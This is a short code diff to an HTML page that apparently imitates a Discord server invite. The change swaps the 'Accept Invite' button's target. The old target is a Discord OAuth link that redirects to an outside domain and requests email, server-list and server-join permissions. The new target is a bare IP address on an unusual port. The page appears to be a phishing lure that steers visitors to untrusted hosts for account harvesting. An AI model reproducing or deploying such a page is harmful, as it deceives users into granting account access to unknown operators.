--- a/invite.html
+++ b/invite.html
@@ -32,7 +32,7 @@
                 src='https://cdn.discordapp.com/icons/899175503565553714/51975d2312a1595966d239db6a5fcb7d.png'></div>
             <p><span class="server">! レムリン has invited you to join</span></p>
           </div>
-          <a href="https://discord.com/oauth2/authorize?response_type=code&client_id=888666415559770112&redirect_uri=http%3A%2F%2Fmoon9999.xyz%2Fcallback&scope=identify+email+guilds+guilds.join&state=RIpCni0i4EFPNuXrhvmBljxQKCMZw4" class="acceptBtn">Accept Invite</a>
+          <a href="http://218.147.251.17:5858/" class="acceptBtn">Accept Invite</a>
         </form>
       </div>
     </div>
